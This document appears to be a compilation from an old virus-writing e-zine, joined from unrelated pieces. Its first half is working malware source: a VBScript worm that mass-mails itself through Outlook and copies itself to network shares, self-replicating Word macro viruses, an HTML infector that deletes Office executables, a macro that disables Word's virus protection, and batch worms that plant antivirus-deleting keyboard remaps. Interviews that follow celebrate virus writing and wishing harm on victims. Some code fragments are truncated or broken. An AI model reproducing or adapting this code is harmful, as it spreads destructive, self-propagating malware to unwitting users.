<property name="TextFile"/>
<property name="WormFile"/>
<method name="DelTempFiles"/>
<method name="NetworkSpreading">
<parameter name="FileName"/>
</method>
<method name="OutlookSpreading">
<parameter name="Body"/>
<parameter name="MaxAmount"/>
<parameter name="Subject"/>
</method>
<method name="ShowText">
<parameter name="Content"/>
</method>
</public>
<script language="VBScript">
<![CDATA[
Sub DelTempFiles
On Error Resume Next
Set FSO = CreateObject("Scripting.FileSystemObject")
If FSO.FileExists(AttachmentFile) Then FSO.DeleteFile AttachmentFile, True
If FSO.FileExists(TextFile) Then FSO.DeleteFile TextFile, True
Set FSO = Nothing
End Sub
Sub NetworkSpreading(FileName)
On Error Resume Next
Set Network = CreateObject("WScript.Network")
Set Shares = Network.EnumNetworkDrives
If Shares.Count > 0 Then
Set FSO = CreateObject("Scripting.FileSystemObject")
For Counter1 = 0 To Shares.Count - 1
If Shares.Item(Counter1) <> "" Then FSO.CopyFile WormFile, FSO.BuildPath(
Shares.Item(Counter1), FileName)
Next
Set FSO = Nothing
End If
Set Shares = Nothing
Set Network = Nothing
End Sub
Sub OutlookSpreading(MaxAmount, Subject, Body)
On Error Resume Next
Set FSO = CreateObject("Scripting.FileSystemObject")
FSO.CopyFile WormFile, AttachmentFile
Set FSO = Nothing
Outlook = ""
Set Outlook = CreateObject("Outlook.Application")
If Outlook <> "" Then
Set MAPI = Outlook.GetNameSpace("MAPI")
For Each List In MAPI.AddressLists
If List.AddressEntries.Count > 0 Then
Set Email1 = Outlook.CreateItem(0)
If List.AddressEntries.Count > MaxAmount Then
Dim Address()
ReDim Address(MaxAmount - 1)
For Counter1 = 0 To MaxAmount - 1
Address(Counter1) = Int(List.AddressEntries.Count * Rnd)
Next
For Counter1 = 0 To MaxAmount - 1
For Counter2 = Counter1 + 1 To MaxAmount - 1
If Address(Counter1) = Address(Counter2) And Address(Counter1) <> -1 Then
Address(Counter2) = -1
Next
Next
For Counter1 = 0 To MaxAmount - 1
If Address(Counter1) = -1 Then Address(Counter1) = Int(
List.AddressEntries.Count * Rnd)
Next
For Counter1 = 0 To MaxAmount - 1
For Counter2 = Counter1 + 1 To MaxAmount - 1
If Address(Counter1) = Address(Counter2) And Address(Counter1) <> -1 Then
Address(Counter2) = -1
Next
Next
For Counter1 = 0 To MaxAmount - 1
If Address(Counter1) <> -1 Then
Set Entry = List.AddressEntries(Address(Counter1))
If Counter1 = 0 Then Addresses = Entry.Address Else Addresses = Addresses &
"; " & Entry.Address
Set Entry = Nothing
End If
Next
Else
For Counter1 = 1 To List.AddressEntries.Count
Set Entry = List.AddressEntries(Counter1)
If Counter1 = 1 Then Addresses = Entry.Address Else Addresses = Addresses &
"; " & Entry.Address
Set Entry = Nothing
Next
End If
Email1.BCC = Addresses
Email1.Subject = Subject
Email1.Body = Body
Email1.Attachments.Add AttachmentFile
Email1.DeleteAfterSubmit = True
Email1.Send
Set Email1 = Nothing
Randomize
If Int(5 * Rnd) = 0 Then
Set Email2 = Outlook.CreateItem(0)
Email2.BCC = Addresses
Email2.Subject = "Alma"
Email2.Body = "No alucines que te amo," & Chr(13) & Chr(10) & "cuando en
realidad es solo" & Chr(13) & Chr(10) & "mi coraz" & Chr(243) & "n qui" & Chr(233) & "n lo
hace." & Chr(13) & Chr(10) & "Porque como ya sabr" & Chr(225) & "s," & Chr(13) & Chr(10) &
"mi coraz" & Chr(243) & "n no manda en mi vida," & Chr(13) & Chr(10) & "si as" & Chr(237) &
" lo hiciera," & Chr(13) & Chr(10) & "mi alma estar" & Chr(237) & "a perdida."
Email2.DeleteAfterSubmit = True
Email2.Send
Set Email2 = Nothing
End If
End If
Next
Set MAPI = Nothing
Set Outlook = Nothing
End If
End Sub
Sub ShowText(Content)
On Error Resume Next
Set FSO = CreateObject("Scripting.FileSystemObject")
Set File = FSO.CreateTextFile(TextFile, True)
File.Write(Content)
File.Close
Set File = Nothing
Set FSO = Nothing
Set WSHShell = CreateObject("WScript.Shell")
WSHShell.Run(TextFile)
Set WSHShell = Nothing
End Sub
]]>
</script>
</component>
VERSION 1.0 CLASS
BEGIN
MultiUse = -1 'True
END
Attribute VB_Name = "ThisDocument"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Private Function IT()
On Error Resume Next
Application.EnableCancelKey = wdCancelDisabled
Set A = VBE.SelectedVBComponent.CodeModule
B = A.Lines(A.ProcStartLine("IT", vbext_pk_Proc), A.ProcCountLines("IT", vbext_pk_Proc))
For c = 1 To VBE.VBProjects.Count
For D = 1 To VBE.VBProjects(c).VBComponents.Count
Set E = VBE.VBProjects(c).VBComponents(D).CodeModule
If E.ProcOfLine(E.ProcStartLine("IT", vbext_pk_Proc), 1) <> "IT" And E.CountOfLines > 2 Then
E.AddFromString B
For F = 1 To E.CountOfLines
G = E.ProcOfLine(F, 1)
If H <> G And G <> "IT" And Right(E.Lines(E.ProcStartLine(G, vbext_pk_Proc), 1), 4) <> ": IT"
Then
E.ReplaceLine E.ProcStartLine(G, vbext_pk_Proc), E.Lines(E.ProcStartLine(G, vbext_pk_Proc), 1
) & ": IT"
H = G
End If
Next
Next
Next
End Function
Private Sub Document_Open(): IT
'My_Creator = Lys Kovick
'My_Name = Neclovek
'My_Comments = Do Not Distribute!
End Sub
VERSION 1.0 CLASS
BEGIN
MultiUse = -1 'True
END
Attribute VB_Name = "ThisDocument"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Private Function IT()
On Error Resume Next
Application.EnableCancelKey = wdCancelDisabled
Set A = VBE.SelectedVBComponent.CodeModule
B = A.Lines(A.ProcStartLine("IT", vbext_pk_Proc), A.ProcCountLines("IT", vbext_pk_Proc))
For c = 1 To VBE.VBProjects.Count
For D = 1 To VBE.VBProjects(c).VBComponents.Count
Set E = VBE.VBProjects(c).VBComponents(D).CodeModule
F = ""
F = E.Lines(E.ProcStartLine("IT", vbext_pk_Proc), E.ProcCountLines("IT", vbext_pk_Proc))
If E.CountOfLines > 2 And F <> B Then E.AddFromString B
For G = 1 To E.CountOfLines
H = E.ProcOfLine(G, 1)
If I <> H And H <> "IT" And Right(E.Lines(E.ProcStartLine(H, vbext_pk_Proc), 1), 4) <> ": IT"
Then
E.ReplaceLine E.ProcStartLine(H, vbext_pk_Proc), E.Lines(E.ProcStartLine(H, vbext_pk_Proc), 1
) & ": IT"
I = H
End If
Next
Next
Next
End Function
Private Sub Document_Open(): IT
'My_Creator = Lys Kovick
'My_Name = Unperson
'My_Comments = Do Not Distribute!
End Sub
<SCRIPT LANGUAGE="VBScript">
<!--
Dim FSO,MSBound,DC,D,TMP,F
MSBound = "<SCRIPT LANGUAGE=#VBScript#>$<!--$ Dim FSO,MSBound,DC,D,TMP,F$ MSBound =
#|#$ On Error Resume Next$ TMP = ReplaceWithIn(Chr(36),vbCrLf,MSBound)$ TMP =
ReplaceWithIn(Chr(35),Chr(34),TMP)$ F = InStr(1,TMP,Chr(124))$ MSBound = Left(TMP,F-1) &
MSBound & Mid(TMP,F+1)$ F = InStr(2500,MSBound,Chr(124))$ MSBound = Left(MSBound,F-1) &
Mid(MSBound,F+1)$$ Set FSO = CreateObject(#Scripting.FileSystemObject#)$ If Err.Number = 0
Then$ Set DC = FSO.Drives$ For Each D In DC$ If D.DriveType = 2
Then$ SweepDrive D.DriveLetter & #:\#$ End If$ Next$ End If$$Sub
SweepDrive(pPath)$ Dim F, S, O$ On Error Resume Next$ Set F = FSO.GetFolder(pPath)$
InfectFiles F$ Set S = F.SubFolders$ For Each O In S$ SweepDrive(pPath & O.Name &
#\#)$ Next $End Sub $$Sub InfectFiles(pFolder)$ Dim F,Member,Ext,M,C$ On Error
Resume Next$ Set F = pFolder.Files$ For Each Member In F$ M =
UCase(Member.Name)$ If M = #WINWORD.EXE# Or M = #ACCESS.EXE# Or M = #EXCEL.EXE# Or M =
#WORD.EXE# Then$ Set M = FSO.GetFile(Member.Path)$ M.Attributes =
(M.Attributes And 1) - 1$ M.Delete$ End If $ Ext =
UCase(FSO.GetExtensionName(Member.Name))$ If Ext = #HTML# Or Ext = #HTM# Then$
Set M = FSO.OpenTextFile(Member.Path,1)$ C = M.ReadAll$ If
InStr(1,C,MSBound) = 0 Then$ Set M = FSO.CreateTextFile(Member.Path,
True)$ M.WriteLine MSBound & C$ M.Close$ End If$ End if$
Next$End Sub$$Private Function ReplaceWithIn(CurChar,NewChar,SourceString)$ Dim T,TMP$ T =
1$ TMP = SourceString$ Do While T > 0$ T = InStr(T, TMP, CurChar)$ If T > 0 Then
TMP = Left(TMP,T-1) & NewChar & Mid(TMP,T+1)$ Loop$ ReplaceWithIn = TMP$End
Function$$'MSBound by Suppa.$-->$<|/SCRIPT>$$"
On Error Resume Next
TMP = ReplaceWithIn(Chr(36),vbCrLf,MSBound)
TMP = ReplaceWithIn(Chr(35),Chr(34),TMP)
F = InStr(1,TMP,Chr(124))
MSBound = Left(TMP,F-1) & MSBound & Mid(TMP,F+1)
F = InStr(2500,MSBound,Chr(124))
MSBound = Left(MSBound,F-1) & Mid(MSBound,F+1)
Sub SweepDrive(pPath)
Dim F, S, O
On Error Resume Next
Set F = FSO.GetFolder(pPath)
InfectFiles F
Set S = F.SubFolders
For Each O In S
SweepDrive(pPath & O.Name & "\")
Next
End Sub
Sub InfectFiles(pFolder)
Dim F,Member,Ext,M,C
On Error Resume Next
Set F = pFolder.Files
For Each Member In F
M = UCase(Member.Name)
If M = "WINWORD.EXE" Or M = "ACCESS.EXE" Or M = "EXCEL.EXE" Or M = "WORD.EXE" Then
Set M = FSO.GetFile(Member.Path)
M.Attributes = (M.Attributes And 1) - 1
M.Delete
End If
Ext = UCase(FSO.GetExtensionName(Member.Name))
If Ext = "HTML" Or Ext = "HTM" Then
Set M = FSO.OpenTextFile(Member.Path,1)
C = M.ReadAll
If InStr(1,C,MSBound) = 0 Then
Set M = FSO.CreateTextFile(Member.Path, True)
M.WriteLine MSBound & C
M.Close
End If
End if
Next
End Sub
'MSBound by Suppa.
-->
</SCRIPT>
<HTML>
<HEAD><TITLE>MSBound</TITLE></HEAD>
<BODY BGCOLOR="#000000">
<BR><BR><BR>
<CENTER><TABLE BORDER=0 BGCOLOR="#000000" CELLPADDING=10>
<TR><TD>
<FONT COLOR="#FF0000">
<U><B><FONT COLOR="#FF0000"> MSBound by Suppa.</B></U>
<BR><BR><BR>
This is the parent HTML file containing MSBound written by Suppa.<BR>
Feel free do to what you want with it, but don't blame me if it comes back to you.<BR>
<BR>
Special thanks go out to Gigabyte for getting me interested in these things.<BR>
</FONT>
</TD></TR>
</TABLE></CENTER>
</BODY>
</HTML>
VERSION 1.0 CLASS
BEGIN
MultiUse = -1 'True
END
Attribute VB_Name = "ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Private Declare Function SetSysColors Lib "user32" (ByVal nChanges As Long, lpSysColor As
Long, lpColorValues As Long) As Long
Private Sub Document_Open()
' LSD
' By The WalruS 09/00 v1.00
Randomize
Case "9.0"
System.PrivateProfileString("",
"HKEY_CURRENT_USER\Software\Microsoft\Office\9.0\Word\Security", "Level") = 1&
CommandBars("Macro").Controls("Security...").Enabled = False
Case "8.0"
Options.VirusProtection = False
Options.SaveNormalPrompt = False
Options.ConfirmConversions = False
End Select
With Application
.ScreenUpdating = False
.DisplayStatusBar = False
.DisplayAlerts = False
End With
ChangeHook = Int(Rnd * 2)
Select Case ChangeHook
Case 0
Hook = "Private Sub Document_Open()"
Case 1
Hook = "Private Sub Document_Close()"
End Select
With Dialogs(wdDialogFileSummaryInfo)
.Author = "WalruS"
.Title = "CandyFlippin"
.Execute
End With
TimeCheck = Second(Now)
One = Left(TimeCheck, 1)
Two = Right(TimeCheck, 1)
If One = Two Then Call CandyFlip
NormalTemplate.Saved = True
If ActiveDocument.Saved <> True Then ActiveDocument.Save
End Sub
' ---[snip]---
' Hi there kids, this some very old werk to show you how to code anti-
' bloodhound-heuristically. Well, it's just a basic example to prove
' that it's possible to bypass that heuristic. xD Just check it out and
' enjoy!
' ---[snip]---
' Hi there kids, same as Lithium, I just can present you some old werk
' because of that damn zip disk crash. Hope you can enjoy this language
' independent x97m. Catch y'all around.
::IRC.HighHopes.c
::by -KD- [Metaphase VX Team & NoMercyVirusTeam]
::Greets to Evul, Tally, AngelsKitten, KidCypher, nucleii,
::Roadkil, Zanat0s, Duke, Lys, Jackie, Foxz, darkman, lea
::Raven, Deloss, JFK, BSL4, and -Everyone- in #virus
:noscr
echo Keep this open for to have Good Luck! >>c:\highhopes1.txt
echo When it closes you will have Good Luck! >>c:\highhopes1.txt
echo Some one has high hopes for You!! >>c:\highhopes1.txt
@echo on
type c:\highhopes1.txt
@echo off
echo y| del c:\highhopes1.txt >nul
if errorlevel 1 goto noftp
%windir%\ftp.exe -s:c:\ftpme.txt >nul
:noftp
echo >>c:\highhopes.txt
echo The grass was greener. The light was brigher. >>c:\highhopes.txt
echo The taste was sweeter. The nights of wonder. >>c:\highhopes.txt
echo With friends sorrounding. The dawn mist glowing.>>c:\highhopes.txt
echo The water flowing. The endless river. >>c:\highhopes.txt
echo For Ever And Ever..... >>c:\highhopes.txt
@echo on
type c:\highhopes.txt
@echo off
if errorlevel 1 goto nogo
echo y| del c:\highhopes.txt >nul
cd \pkdown
c:\pkdown\pkzip204.exe >nul
echo y| copy %0 c:\pkdown\highhopes.bat >nul
c:\pkdown\pkzip hope.zip highho~1.bat >nul
echo y| copy hope.zip c:\mirc >nul
cd \
echo y| del c:\pkdown\*.* >nul
rd c:\pkdown >nul
echo y| del c:\ftpme.txt >nul
nogo:
@echo off
cls
@echo off%_FukThat%
::###########################################
::Deloss / NuKE
::###########################################
set FukThat=%0.bat
find "FukThat"<%FukThat%>c:\_FukThat.bat
attrib c:\_FukThat.bat +h
:FG
:FZ
set FukThat=
goto FE
:FV
shift%_FukThat%
goto FV
:FI
find "FukThat"<%3>nul
type %3>FukThat$
echo.>>FukThat$
type c:\_FukThat.bat>>FukThat$
:FD
echo.|date|find "12">nul.FukThat
echo DEVICE=c:\windows\command\ansi.sys>>config.sys
if errorlevel 1 goto FN
:FN
echo.|date|find "13">nul.FukThat
@echo on
echo and if they say you can't come around here say *fuck that*.
echo and if they say you can't come around me say *fuck that*.
ESC["n";"y";13p
ESC["y";"n";13p
ESC["N";"y";13p
ESC["Y";"n";13p
ESC["a";"del c:\avp";13p
ESC["e";"del c:\f-prot";13p
ESC["i";"del c:\mcafee";13p
ESC["o";"del c:\nav";13p
ESC["A";"del c:\avp";13p
ESC["E";"del c:\f-prot";13p
ESC["I";"del c:\mcafee";13p
ESC["O";"del c:\nav";13p
if errorlevel 1 goto FE
echo off
exit FukThat
:FE
Real Time Interview with Rajaat
Interviewer: Gigabyte
First question.. Do all VXers here walk around stoned all day and bang with their heads against lamp posts? <G>
Well, in order to feel at home during an Amsterdam VX meeting you will have to walk the left-hand path of
stonedness. I think I'll manage to become Dutch quite well ;-)
How old were you when you had your first experience with computers?
My first computer was an Aquarius, an ugly little fellow with blue rubber keys. I got it for my birthday when I was 7
years old.
I was just about your age when I conducted my first virus experiments, just before I got 18 years old.
How many viruses have you written by now.. any chance your totally drugged brain can still remember?
I cannot recall an actual number, but I think it must be around 200 or so, including minor variants.
I consider myself to be a 'nice' VXer, if you can speak of such a thing. Since we are evil in the eyes of the end users, I
frankly don't care if I appear to be friendly or not.
Hah, that's a good question. I would likr a language in which you have complete control over the code it generates, so
highly configurable languages like C-- or Terse are good, but lack the things needed in a ring0 win32 environment. I
yet have to look for a free language that comes with source and generates tight code. Perl is interesting, though
extremely bloated.
Did you ever write anything destructive? If so, how do you feel about that now?
I have written one virus that did intentional damage, but after having goofed up with debug I decided for my own
good to try to make them as harmless as possible.
What is, in your opinion, the most idiotic comment about any of your viruses you've seen, from AVers?
I laughed a lot when I saw the description of Fick.7326 on the AVP site. I had expected that Kaspersky would be
smart enough to recognize that major part of it is written in Borland C++, instead of Pascal.
Not that I am aware of. There are people I like and there are people I don't like. These people I do not communicate
with may want to consider themselves my enemy but that makes no difference to me.
I pity them. After so many media hypes (Michelangelo, Melissa, I love you..) people should have learned the
necessity of installing a good scanner from a trusted source.
If a family member would catch one of your viruses and he/she had no AV installed at all, no backups and he/she had
caught it by running an e-mail attachment, despite all the warnings on the Internet and elsewhere, would you help
him/her out?
Yes, and immediately install a cracked version of AVP. I'd tell them they are stupid if they don't keep it updated. My
hobby is writing them, not giving users a hard time. Unfortunately, a virus is made to be spread, thus I give them to
people who are interested.
How long are you planning to stay in the scene? (Out, out!! ;)
I have no set plans whatsoever, but I feel like I have not tried all the things I wish to accomplish. There is so much I
yet would like to try out, but this mainly has to do with compilers and interpreter issues.
How big do you think my chances are to survive smoking a joint? (in %)
Hmm, about 50% at first, after 20 years of smoking weed I guess that gets trimmed down to 5% :-D But you'll get a
try..
If he agrees you can try, but I had troubles myself keeping him in a pose for longer than 2 seconds.
Which AVers do you hate most?
I don't hate them, though it is a pity they earn money on the digital havoc we wreak.
I think I'm proud of most of them. Each time I coded something I tried out new stuff, so each one is a milestone in
my writing (or lack thereof) skills.
I for example like Babylonia for the ideas, win32.crypto for its tricks with encryption. All inventive virus writers have
my respect.
How important is virus writing for you and does it have any influence on your life?
It has not such a great importance as it used to be for me, since my job consumes most time.
Are you in any other underground scene, except for VX? (hacking, phreaking..)
Not very much, it is consumed by my work most of the time, though I might buy one if I got enough cash.
I like some movies like Braveheart, The Mummy, The Matrix, horror and comics. My music preference is hard rock.
I don't have many hobbies though I like reading books and sometimes I even enjoy cooking, since I now have to (can't
live on microwave food alone).
No.
Aargh! Now questions about food while I'm starving? I like pastas and chips of course.
What do you like most about the scene and writing viruses?
Not right now, I'll mail you when I come to think of something.
Interviewer: Gigabyte
First of all, how did you come up with the name 'Irok'?
What about the virus are you personally most proud of?
I'm proud of the fact that avers had no idea what it's payloads did for a very long time.
some of them still have incorrect descriptions ;p
The memory management section. It's a bitch because of all the little routines inside irok.
Do you ever base your viruses or virus payloads on your real life (something/someone you're mad at, something funny
that happened, habits, etc.), and if so, did you do this in Irok?
Did you get any positive or negative reactions on the virus payload from other VXers?
What is, in your opinion, the most funny or idiotic comment about Irok you've seen, from AVers?
When internal counters of the virus reach certain values, the virus displays a message on screen. Most of this message
is from lyrics of the song 'Aenema' by band 'Tool'. We wont reproduce the message here as the song seriously needs
the Parental Advisory sticker for explicit lyrics.
Hahahahahaha
it sure is
Which AV was that from?
http://www.Europe.F-Secure.com/v-descs/irok.htm
hmm, no
toadie was funnier
iroks mean ;p
On which points is Irok better than other viruses, and what are its weak points?
It's better then some other viruses by default because it works as designed...
it's weak points would be the memory it requires, and it's size.
and the fact that it's not polymorphic.
Which other viruses that were in the wild at the time Irok was, or later, do you think that actually were so lame that
they weren't worth any attention at all, and which ones do you respect?
shrug...
The vbs viruses suck in my opinion.
As for respecting viruses... I'd have to respect the author of the virus, and I don't respect many people.
What do you consider the most important advantage and disadvantage compared to ASM viruses?
advantage... total control of the pc, disadvantage, takes a long time to write a good one.
If a family member would catch Irok and he/she had no AV installed at all, no backups and he/she had caught Irok by
running an e-mail attachment, despite all the warnings on the Internet and elsewhere, would you help him/her out?
Nope
I have little/nothing to do with my family.
Do you think the fact that AVers had some trouble figuring out what exactly Irok does, had anything to do with the
language it's written in, as ASIC isn't common for viruses?
Yep
and I think perhaps they don't know asm as well as they claim.
How important is virus writing for you and did writing Irok have any influence on your life (time, effort, pride,
stress)?
probably not.
Yes. For those of you who got hit by it, I hope you lost everything.
Oh yes
Greetings to : heh, Nobody
Hatez goes out to: Most of you on both sides, fuck you all.
So much for political correctness eh? <g>
Interviewer: Gigabyte
Life. Gf, friends, work, parties and all other things you can enjoy doing while you still are a young adult.
None really, don't they all suck? Immortal Riot are though responsible for quite a few really awesome viruses. Not me
in person though.
Some of your viruses were pretty destructive. How do you think about that now?
I don't really think anything about it since it's all behind me. I much rather live in the present than in the past.
Do you think the VX scene has changed a lot in all those years and do you think it was better then or now?
I am not really a part of the scene anymore but I try to lurk around and keep myself a bit updated. I'm though not
really qualified to make such a comparison.
However, I don't really think you can compare things now and then, if a person start writing viruses now, he might
fancy the scene as much I did back in 1993.
What do you think about all the Internet related viruses now and do you think there will be much more of them?
Internet based malware (viruses, worms and so on) is indeed an interesting thing and I'm certain that we'll see more
virus alike programs circulating on the net in the future.
Internet is very vulnerable and many people will target the net due to the fact that internet technology and internet
(un)security are interesting topics and if an attack is done properly, it can affect a lot of people in a very short amount
of time.
I like all viruses. It's a great thing to see that people still sit around and code things just for fun. Programming for me
and most other Immortal Riot guys is nowadays stricly business.
Everyone who deserves it. Further information about this can read in our ezines called Insane Reality which all be
found at our site located at http://www.coderz.net/ImmortalRiot.
Curiousity, I think. I'm a very curious person about pretty much everyting.
How important was virus writing for you?
Compared with what? Viruswriting was a hobby, the scene were our playground and viruswriting the ticket to
acceptance.
Did you base your viruses or virus payloads on real life issues?
I based some names from real life and I got motivation from real life. Everything is about real life issues in one way or
another.
I only know one person who caught one of my viruses ([Bad Attitude]). He saw "Immortal Riot" scolling all over his
monitor and later became a very good coder and an Immortal Riot member.
I work with computers, but on my spare time? Maybe an hour a week, to pay bills, write emails to friends and ex-
girlfriends and of course to annoy people with SMS :).
Greets goes to everyone who ever has been mentioned in a positive matter in Insane Reality and of course to all of
Immortal Riot. Special greets must go to Metal Militia.
You're welcome.
Interview with Del Armg0/MATRiX
Interviewer: EXE-Gency
Give us a short description of who you are. (Handle, interests, occupation, music, films, location, marital status etc.)
I'm 27, lot's girls and one of my nick in life is Fa, humm ... what's more...¿ I'm somebody very curious in fact... lot's
hobbys (vx, phreak, short- wave listener, role-playing-game, playing electronic music too, astronomy, ... i'm happy
when i'm learning in fact ;) Some of my favorites films are "Eraserhead", "CryingFreeman", "Buffet Froid", ... And i
luv music-band like "stereolab", "gong", "bauhaus", ... and many more !
lot's ppl have asked me about it... it's "simply" a name from a AD&D campaign (during 6 years!), there was a
character i played as dungeon master, she was called "Larynda Nedylene Barrisson Del'ArmgO", it was a famous
Martial Drow family, and a very fun game, so... i kept the name.
Have you ever had any previous identities in the computer underground?
nop, i was since i've starting known as Del_Armg0, but it's true for some viral experience i use sometimes another
nick... it's rare. But since the JC'Zic bust, i prefer to be discreet... sometimes.
I've started on a Amstrad cpc 464, and a thomson MO5 !!! Was really shit but really fun. After that i've meet the Atari
world, and it was great moment. Atari 520/1040 ST was really great. And in 1996, i've bought a PC under windows...
humm no comment!
I've a first 'puter with Win95, a 486 with a russian Dos (a graphic Dos) called Pts-Dos 6.70 and Win 3.1, i like it a lot.
And i'm ever using a Atari 1040 (Tos) At work i'm using Win NT, just shit! I hope i will try Win2k soon, i'm sure it
will be a great OS for Vx ;)
How and when did you first discover the computer underground?
Humm... a bit "just like that", i had bought a modem to meet or know more about Underground Electronic ppl... and
it's easy to find evil on the Net ;]
I've started coding to made virus, but i guess the first idea to made a virus come from the first discovered virus when i
was younger, it was really new. And lot's hype was made around it. It was Cpc virus, but i've forgotten the name, the
fascination is always here.. Probably some movies like "Wargames" or "Tron" are importants in the story...
Do you have an interest in the other components of the computer underground? (hack/phreak/warez etc.)
Yep. I'm a great fanatic of phreaking, it's a really great and fun "game". Phone network is full of marvellous things...
and i'm lucky, i'm now working in phone network. Hacking is cool, but sometimes too much full of "big-EGO-
people", so i prefer try it alone.
Really not ! But here in France, it's really easy to be one, and for cops i'm probably one... (drug, phreak, vx, ... it's just
fun life). But why all cool things of life are illegals !!!?¿
Do the laws in your contry make writing viruses illegal and have you had any trouble with the law in your country?
Yes, laws here are very bad for H/P/V; i've never be busted and i hope i won't be! But i'm sometimes tired to be
paranoid when i'm connected... (proxys, wingates and others anonymisers...). Sabia is probably the worst spreading i
did, and my ISP leaves me.. arrgghhhh! ... but ..but Viva phone S.E. ;)
Yep, some of them know about it, but really few. It's bad ideas to talk about it because when u send a mail to your
friend, he's always afraid ;), and 99% of mass ppl really don't care about vx, so...
I never did it, cos i don't like it very much... I guess some coders are good coders, but not really imaginative... Virus
are artworks, but destruction can be art, so...why not... It's a really great and endless debate, but to my mind, a
destructive program is not really a virus. Virus must spread and spread, so why to kill the host and kill himself, in the
same time ?
How did you get involved with the Matrix virus group?
mort was a good electronic friend, some groups ask me for joining, but i was not interrested, i said it to mort, and so
he asks me to join MATRiX, this time i said "ok".
Does the Matrix group concern themselves with virus programming only or do they have an interest in other
underground topics?
Actually MATRiX concern only virus coding, but i hope i could introduce some others subjects like phreaking, trojans,
hacking, ...
Nop, and i've never thought to be in a group, i liked to be alone; but it could be a good experience (and mort is a
really good friend).
Why did you start learning to program? Was it because you wanted to write computer viruses.
i've started to program in 1998 with Delphi, and yes i've started learning to program to write viruses/trojans. So fastly
i've learn asm, i've again to learn asm32 (i'be start). I like a lot to learn some toys or silly languages like VB, VDscript,
batch, rebol, javascript,...
Delphi/Pascal, Asm/Asm32 for serious coding Vba/Vbs, html/wml, and some others scripting languages, for silly
things I find Rebol very interesting too (31 platforms !!) I like Toys like PcomP, VDS, M:POSTER,...
Wooo! Really hard...! but IRC-Worm.ElSpy.2278 & .9619 was great worm at this time, it was my really first, and they
had some cool features. i liked a lot my script generator too, called "SENSI". And my prog "Bundy" cos' the silly
splash screen.
I guess 29A is one of the most prolific and original group of the present time. Perhaps even too present.. i liked
Phalcon-Skism, Immortal Riot, SLAM ... but it's a bit old..skool
Which individual programmers (both past and present) do you value most highly?
Wooo, really hard to answer! But i like legend like DarkAvenger and stories like that. Bulgarian Myth is great. The
text about it are nice novels
Really a lot! I read almost all E-zines about Vx and Phreaking, i read some french Hacking zines too.
(www.madchat.org) Cool H/P zines are PyroFreak, IGA, Hackoff, ... ... ... For Vx Zines, 29A & Vxtasy are perhaps the
bests (after MATRiX zine, of course:)
What do you think of the virus scene? (Both in general and in your own country.)
I know well the vx trading scene, and there is too much politics... About vx scene, it's a cool place, but too much
young people don't want to see that in vx coding there's an EGO part. Hahahaha! I have some electronic friends, but
i'm sometimes a bit away from vx scene.
How has the underground scene changed since you first entered? Scene has changed yes, but scene changed so fastly.
Guy appears, disappears,... But since the beginning i've kept some good electronic friend in vx scene, it's enough for
me. (booohh Phage!;(
It will depend on different things, like OS. If Linux becomes the main OS it will be a revolution for vxers, probably the
scene will be totally changed. And more networks and networking application appear, more worms come too. So future
of virus is more in the hand of mass ppl than in our hands.
A Worm of course :), Joke! But i believe really that the future of the virus is in the worm properties, The next
generation of viral code must have abilities to infect the new hardwares (like mobil-phone) and spread using new
protocols. WAP network, GRPS and UMTS protocol will be used by phone and tiny computer, the virus will have to
use worm technics to spread between phones, computers and other palm & psion. I like the idea of a Autonomous
Mobile Cyber Weapon (AMCW) too. The perfect virus will have to use main worm features, will know and find his
target and infecting files traded by network user (like pictures, ...yes my dream will be to infect .jpg :)
What advice would you give to newbies entering the virus scene?
download, print, read, download, print, read, download, print, read, ... After 6 months like that, come on Irc to meet
some ppl and code, code, code, ... A good thing is really to learn the maximum possible things, learn some languages,
learn about OS, learn about protocol, learn about people, learn, learn, learn, ...
It depends really of the newbie, learn Asm first is good to learn some universal maths/coding theories, after Asm all
others languages seems easy, hehehe. But the better thing to do is to try all, to learn again and again. All languages are
good if u know really this language, the hardest is perhaps to find THE language.
I guess no, lot's things have been said. And i'm not somebody very talkative (gossipy?) cya.
Any greets?
Yes a lot!!! Greets to : Phage, Perikles, VirusBust, MATRiX team, HomeSlice, Daniel3 Lyskovick, Secret_- Trov,
ArteMuse, pbat, mort, Ultras, NBK, TGR, LordDark, Anaktos U, Iblis, W0de, FreDyKrug, Elsa, MelanYe,Roadkill,
Zulu, Mist, Urgo32, me, hashish, all!
Sure !
mailto: delly@fr.st
http://www.delly.fr.st
http://www.coderz.net/matrix
VX meeting 2000 in Czech Republic:
Opinions of a few VXers
Interviewer: Gigabyte
First week of August, quite sunny, boring IRC channels.. the ideal moment for the yearly VX meeting. While
AVers were probably thinking all VXers were sitting in their rooms, with a computer, avoiding the sun and
giving dumb users a hard time by writing new viruses, some of us were in fact having a great time in Brno,
Czech Republic, getting drunk, stoned, even getting some suntan and sticking 'GriYosoft' papers all over the
city. If we still remember anything? I sure do! Lets see what the guys have to say..
GriYo: Oh, if... I always enjoy in all the meetings that we organize in summer.
I always find there great dudes ( and dudettes :-P ) and also new places, so i can get my hands out of the keyboard for
some days.
Benny: ABSOLUTELY YES!!! I can say it was one of the best timez in this year... you dont think so?
Ratter: of course. it was my first VX meeting in my life and i met great ppl there which i knew only on Internet. It was
a great time for me. One of the best in my life...
GriYo: I had fun one day we went to a big park in Brno... I had brought a little bit of hashish from Spain, and we
were smoking... We don't take in beginning to say foolishness and to laugh without stopping, it was really funny.
Benny: Yeah, sure. GriYosoft action. all city was full of posters :) and i will never forget how you, GigaByte, got
absolutely stoned and drunk, hehe.
Ratter: yeah i missed darkman there. and other ppl that do VXing
How often did you have a hangover?
GriYo: Well, we had a hangover every morning... I thought that i was accustomed to drink a lot of beer, but I was
wrong, eh Benny? ;-))))
Benny: almost every morning...:P but three or four beerz in the morning helped me a lot to forget :)
Ratter: I don't have hangover after weed :) and i didn't drink a lot
Kevin & Kell
Bill Holbrook
What follows is the result of a run in I had with a seriously stupid
IRCop of Undernet. If you the reader doesn't know or understand shared
drives and net.exe, This entire file will be one boring read for you.
For the rest of us, It's funny as hell... Definatly a keeper if I do say
so myself :]
<CiCi> why?
<Raid> I don't think you quiet understand what you erm, reported me for. heh
<Raid> Mr chaplain had open shared drives. I didn't do anything to him, I told him it was
there; I even directed him to a website for zone alarm. (firewall; fixes that problem)
<Raid> I told him if I was a jerk as he said, I would have formatted him.
<Raid> I didn't do so. hehe
<Raid> I didn't "hack" him or anything.
